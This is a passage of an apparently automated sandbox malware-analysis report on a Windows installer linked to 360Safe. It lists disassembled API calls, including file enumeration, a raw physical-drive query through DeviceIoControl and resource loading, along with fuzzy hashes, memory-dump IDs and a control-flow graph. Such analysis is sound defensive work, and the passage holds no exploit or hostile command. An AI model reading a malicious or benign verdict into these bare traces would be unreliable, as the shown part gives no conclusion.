                                                                                                                                                                                                                      • API String ID: 3086268848-438819550
                                                                                                                                                                                                                      • Opcode ID: 55a04bc9f5f8500ac00d5f649fe2dcbc3eddec2aefc25fcb4cb56237c8ab2c2b
                                                                                                                                                                                                                      • Instruction ID: 23854570f4ec3a650be4a6be1b179317bb2181028e2c66293887193171226b77
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55a04bc9f5f8500ac00d5f649fe2dcbc3eddec2aefc25fcb4cb56237c8ab2c2b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C21108B13257059BD310AA724CC4F5B32ACDF8E749F040939EA19D2B42F7B0B80487B8
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00ACCF8A: FindClose.KERNEL32(?,?,00ACD728,00000190,?,?,00AD956F,?,?,?,?,?,?,?,0000000C), ref: 00ACCFA4
                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD74A
                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD767
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD77A
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000190,?,?,00AD956F,?,?,?,?,?,?,?,0000000C), ref: 00ACD785
                                                                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 00ACD796
                                                                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 00ACD7A0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Find_wcsrchr$CloseErrorFileFirstFullLastNamePathlstrlen
                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                      • API String ID: 3086268848-438819550
                                                                                                                                                                                                                      • Opcode ID: e4256d1ff9865fd490a0121b2f28785fb4a9640b9ef2bbb8e82928ebd46c2293
                                                                                                                                                                                                                      • Instruction ID: 5c3b7bf230276bc25b39311f96f506f0ff228256a32fa16cc6129efa8e07eacc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4256d1ff9865fd490a0121b2f28785fb4a9640b9ef2bbb8e82928ebd46c2293
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0711C1B16003046FD7206B715D89F3B72ECEF55756F12093DFA16E7141EAB0980587A5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00A82750: _vswprintf_s.LIBCMT ref: 00A82783
                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,00AF335B,?,00000064), ref: 00AF2645
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AF267A
                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00002710,?,00000000), ref: 00AF26A2
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AF26BA
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00AF2708
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileHandle_vswprintf_s
                                                                                                                                                                                                                      • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                                                                      • API String ID: 3752575622-2935326385
                                                                                                                                                                                                                      • Opcode ID: c59ed489a44b0a5e7a623fcc84febd13a7a9012fb0e0407d17dda866c1db1c36
                                                                                                                                                                                                                      • Instruction ID: e2747d5362c94e0edc721bde1c89ac8d0aa7caf11f36f967aa5b055067483e78
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c59ed489a44b0a5e7a623fcc84febd13a7a9012fb0e0407d17dda866c1db1c36
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28418F71504344AFE324EB69DC86EAFB3E8FFC9700F400A1DF69893191EB7099448B62
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ACD2C2
                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00ACD2FE
                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00ACD330
                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00ACD33E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Find$File$CloseFirstNext_memset
                                                                                                                                                                                                                      • String ID: .$\*.*
                                                                                                                                                                                                                      • API String ID: 1570986888-3701014519
                                                                                                                                                                                                                      • Opcode ID: a56ade99769d771a49854afca2afffcf9f980ee1637b76e90ada830297aa6aa9
                                                                                                                                                                                                                      • Instruction ID: b04d93c7af8d94c8ab8395706bf913390a5247270c2d1eee48600e17c989c2e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a56ade99769d771a49854afca2afffcf9f980ee1637b76e90ada830297aa6aa9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C711C4B6900218ABCB20EBB5DC49EEB77BCEB49310F4041B5F625E3141E7349E458B95
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE0152
                                                                                                                                                                                                                      • FindResourceW.KERNEL32(00000000,?,?,DLL), ref: 00AE0163
                                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,00000000), ref: 00AE0174
                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00AE0180
                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00AE018B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3046278646-0
                                                                                                                                                                                                                      • Opcode ID: 269768ec1ee68fd81545c50cb1f6637931c844b6eb3fd96986a33f9541e1e568
                                                                                                                                                                                                                      • Instruction ID: fc394137c048ca20b4cdd32035624786b867f4d4818c28265fd47f53d0fa044d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 269768ec1ee68fd81545c50cb1f6637931c844b6eb3fd96986a33f9541e1e568
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1F062725002057FCB219F66EC08A9B7F68EF04762F004024F91897210DB71C851DB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00B5C628,00B5C628,00B5CDBC,00000000,00B5C68C,0294F440), ref: 00ADDA53
                                                                                                                                                                                                                        • Part of subcall function 00A8D354: _wcsnlen.LIBCMT ref: 00A8D36B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileString_wcsnlen
                                                                                                                                                                                                                      • String ID: 360Installer
                                                                                                                                                                                                                      • API String ID: 4066129061-2026047672
                                                                                                                                                                                                                      • Opcode ID: b42ce50ed83f0d27eaa7d54aa02437415e801fa554ed48964767d0d07c20b0d9
                                                                                                                                                                                                                      • Instruction ID: 71858da7d662e690c4390b73b8426eb41d08927ec9979b7ce5eb36b5005f3a4c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b42ce50ed83f0d27eaa7d54aa02437415e801fa554ed48964767d0d07c20b0d9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1E03933104210ABD6209BA9DD84D9BB7EAEF88760F044A19F659A3261CA316C20CBA1

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 0 ad1dad-ad1e1a call af5421 call a8b9b4 call ae53e7 GetClientRect call ab72a6 call ab73d5 11 ad1e1c-ad1e26 call ab72a6 0->11 12 ad1e28-ad1e4d call ab72a6 SetTimer 0->12 17 ad1e53-ad1e7c call a7ba90 call ad0831 11->17 12->17 23 ad2016-ad2051 call a8cb91 call af4550 call acd7ff 17->23 24 ad1e82-ad1e98 call a7c8e0 17->24 49 ad2053 23->49 29 ad1e9e-ad1edf call af4550 * 2 GetSystemDirectoryW 24->29 30 ad2069-ad207a call ad0b81 24->30 46 ad1f4e-ad1f56 29->46 47 ad1ee1-ad1f3d call a7b680 call acda9d call a8a88c call a8cb91 call a7dd20 PathCombineW 29->47 37 ad20ac-ad20bb 30->37 38 ad207c-ad20aa MoveWindow 30->38 41 ad20c1-ad2477 MoveWindow * 2 GetWindowRect call aa60a3 call ab6598 call ac2fde GetWindowRect SetWindowPos call ab6598 call ac1e2d GetWindowRect SetWindowPos call ab6598 call ac2fde GetWindowRect SetWindowPos call ab6598 call ac1e2d GetWindowRect SetWindowPos call ab6598 call ac1e2d GetWindowRect call ab6598 call ac2fde GetWindowRect SetWindowPos call ab6598 call ac1e2d GetWindowRect SetWindowPos call ab6598 call ac2fde GetWindowRect SetWindowPos call ab6598 call ac1e2d GetWindowRect SetWindowPos call ac13ed call ab6576 GetDlgItem call aa6c96 call ac134f call acb123 MoveWindow 37->41 38->41 133 ad247d 41->133 134 ad2479-ad247b 41->134 46->30 72 ad1f3f-ad1f49 call a7dd20 47->72 73 ad1f5b-ad1f88 call a7b680 call ad041e call a7dd20 47->73 49->30 53 ad2055-ad2063 PostMessageW 49->53 53->30 72->46 73->72 87 ad1f8a-ad1fa0 call accb21 73->87 87->72 93 ad1fa2-ad1fb0 87->93 95 ad1fbb-ad2014 call a7dd20 call a7c8e0 call af4550 call acd7ff 93->95 96 ad1fb2 93->96 95->49 96->72 98 ad1fb4-ad1fb9 96->98 98->72 98->95 135 ad247e-ad252f ShowWindow * 2 call ac13ed call ab6576 GetDlgItem call aa6c96 call ac134f call acb123 MoveWindow ShowWindow call ace3d1 133->135 134->135 147 ad2534-ad2563 call a7dd20 call af4647 135->147
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AD1DCC
                                                                                                                                                                                                                        • Part of subcall function 00A8B9B4: __EH_prolog3.LIBCMT ref: 00A8B9BB
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00AD1DF6
                                                                                                                                                                                                                        • Part of subcall function 00AB72A6: __EH_prolog3.LIBCMT ref: 00AB72C5
                                                                                                                                                                                                                        • Part of subcall function 00AB72A6: _memset.LIBCMT ref: 00AB72EC
                                                                                                                                                                                                                        • Part of subcall function 00AB73D5: __EH_prolog3.LIBCMT ref: 00AB73F4
                                                                                                                                                                                                                        • Part of subcall function 00AB73D5: _memset.LIBCMT ref: 00AB7422
                                                                                                                                                                                                                      • SetTimer.USER32(?,0000012E,000007D0,00000000), ref: 00AD1E4D
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AD1EAF
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AD1EC6
                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00AD1ED7
                                                                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,360\360Safe,00000000,0000005C,00000000,00000000,?,?,?,?,?,00B3CC68), ref: 00AD1F35
                                                                                                                                                                                                                        • Part of subcall function 00AD041E: __EH_prolog3.LIBCMT ref: 00AD0425
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AD1FEF
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AD2038
                                                                                                                                                                                                                      • PostMessageW.USER32(00003922,C:\Program Files (x86)\360\360Safe,00000001,?), ref: 00AD2063
                                                                                                                                                                                                                      • MoveWindow.USER32(?,00000130,00000118,0000008C,00000028,00000001,?,?,00000000), ref: 00AD2093
                                                                                                                                                                                                                      • MoveWindow.USER32(?,000000E5,000000A0,0000008C,00000028,00000001,?,?,00000000), ref: 00AD20C1
                                                                                                                                                                                                                      • MoveWindow.USER32(?,00000012,0000013C,0000005F,00000014,00000001,?,00000000), ref: 00AD20DA
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00AD20F9
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00AD2130
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,0000009F,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD2149
                                                                                                                                                                                                                        • Part of subcall function 00AC1E2D: __EH_prolog3.LIBCMT ref: 00AC1E34
                                                                                                                                                                                                                        • Part of subcall function 00AC1E2D: GetWindowTextW.USER32(?,00000000,00000064), ref: 00AC1E5D
                                                                                                                                                                                                                        • Part of subcall function 00AC1E2D: GetDC.USER32(?), ref: 00AC1E70
                                                                                                                                                                                                                        • Part of subcall function 00AC1E2D: GetWindowRect.USER32(?,?), ref: 00AC1E8B
                                                                                                                                                                                                                        • Part of subcall function 00AC1E2D: SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00AC1EFC
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00AD218A
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD21A2
                                                                                                                                                                                                                        • Part of subcall function 00AC2FDE: __EH_prolog3_GS.LIBCMT ref: 00AC2FE5
                                                                                                                                                                                                                        • Part of subcall function 00AC2FDE: SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00AC3038
                                                                                                                                                                                                                        • Part of subcall function 00AC2FDE: EndPaint.USER32(?,?), ref: 00AC3045
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00AD21DE
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD21F6
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00AD2236
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD224D
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00AD2280
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00AD22D2
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD22EA
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00AD232A
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD2342
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00AD237E
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD2395
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00AD23CB
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD23ED
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000419), ref: 00AD2418
                                                                                                                                                                                                                        • Part of subcall function 00ACB123: GetParent.USER32(00000000), ref: 00ACB143
                                                                                                                                                                                                                        • Part of subcall function 00ACB123: GetWindowRect.USER32(00000000,?), ref: 00ACB161
                                                                                                                                                                                                                        • Part of subcall function 00ACB123: SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005), ref: 00ACB191
                                                                                                                                                                                                                      • MoveWindow.USER32(?,00000006,00000114,00000078,00000024,00000001,00000418,PNG,00000001,?,00000000), ref: 00AD246B
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000,?,00000000), ref: 00AD2484
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000,?,00000000), ref: 00AD2491
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000041B), ref: 00AD24BC
                                                                                                                                                                                                                      • MoveWindow.USER32(?,00000006,00000114,00000078,00000024,00000001,0000041B,PNG,00000001,?,00000000), ref: 00AD250F
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000,?,00000000), ref: 00AD251C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$H_prolog3_memset$Move$Show$Item$ClientCombineDirectoryH_prolog3_MessagePaintParentPathPostSystemTextTimer
                                                                                                                                                                                                                      • String ID: 360\360Safe$C:\Program Files (x86)\360\360Safe$PNG
                                                                                                                                                                                                                      • API String ID: 2096816715-59599569
                                                                                                                                                                                                                      • Opcode ID: a5f95394d10cd8e60a7255e830b95f0bee1ef5daf17d7015f5c2563ec1bb6e40
                                                                                                                                                                                                                      • Instruction ID: 50d27e4545e24430f200a7c6e3281208e8cfefccafabe8ea6c2982d8e8d4a71d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5f95394d10cd8e60a7255e830b95f0bee1ef5daf17d7015f5c2563ec1bb6e40
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1225F71640608BFEB21EBB4CD46FFFB7BAAF48704F000829F656A6192DB716904CB51

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00AD0BC6
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000044E), ref: 00AD0BF9
                                                                                                                                                                                                                        • Part of subcall function 00AA6C96: SetWindowLongW.USER32(?,000000FC,?), ref: 00AA6CBC
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000044F), ref: 00AD0C20
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000,000000CF,PNG,0000044F,PNG,00000004,000000CF,PNG,00000004), ref: 00AD0C7F
                                                                                                                                                                                                                      • MoveWindow.USER32(?,000000D6,000000B4,000000C8,0000001E,00000001,00000000), ref: 00AD0CA2
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005,00B35634,00FFFFFF), ref: 00AD0CDD
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00AD0CF5
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00AD0D1F
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F3), ref: 00AD0D78
                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00AD0DB6
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00AD0DC3
                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00AD0DD3
                                                                                                                                                                                                                        • Part of subcall function 00AC134F: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000006,?,?,00000000,?,?,?,00AA77F9,0000013F,PNG), ref: 00AC13A1
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AD0E26
                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,000000FF), ref: 00AD0E38
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000044D), ref: 00AD0E63
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000,004F4F4F,00B35628), ref: 00AD0E98
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000405), ref: 00AD0EDF
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00AD0F03
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000458), ref: 00AD0F55
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00AD0F79
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000041A), ref: 00AD0FAE
                                                                                                                                                                                                                        • Part of subcall function 00A7DFB0: __CxxThrowException@8.LIBCMT ref: 00A7DFC2
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000,004F4F4F,00B35624), ref: 00AD0FE3
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000416), ref: 00AD102A
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00AD104E
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F4), ref: 00AD1072
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00AD1076
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000413), ref: 00AD1080
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00AD1084
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000414), ref: 00AD108E
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00AD1092
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F6), ref: 00AD109C
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00AD10A0
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F7), ref: 00AD10AA
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00AD10AE
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040E), ref: 00AD10B8
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00AD10BC
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000419), ref: 00AD10C6
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00AD10CA
                                                                                                                                                                                                                        • Part of subcall function 00ACF7F0: CreateSolidBrush.GDI32(00FFFFFF), ref: 00ACF81D
                                                                                                                                                                                                                        • Part of subcall function 00ACF7F0: GetDlgItem.USER32(?,0000040F), ref: 00ACF84A
                                                                                                                                                                                                                        • Part of subcall function 00ACF7F0: GetDlgItem.USER32(?,000003EB), ref: 00ACF8CF
                                                                                                                                                                                                                        • Part of subcall function 00ACF7F0: GetDlgItem.USER32(?,00000410), ref: 00ACF925
                                                                                                                                                                                                                        • Part of subcall function 00ACF7F0: GetDlgItem.USER32(?,000003EC), ref: 00ACF965
                                                                                                                                                                                                                        • Part of subcall function 00AD08F0: __EH_prolog3.LIBCMT ref: 00AD08F7
                                                                                                                                                                                                                        • Part of subcall function 00AD08F0: GetDlgItem.USER32(?,00000415), ref: 00AD0A0B
                                                                                                                                                                                                                        • Part of subcall function 00AD08F0: EnableWindow.USER32(00000000,00000000), ref: 00AD0A13
                                                                                                                                                                                                                        • Part of subcall function 00AD08F0: MoveWindow.USER32(?,00000048,00000095,0000003C,00000014,00000001,?,0000002C), ref: 00AD0A32
                                                                                                                                                                                                                        • Part of subcall function 00AD08F0: GetWindowRect.USER32(?,?), ref: 00AD0A3E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
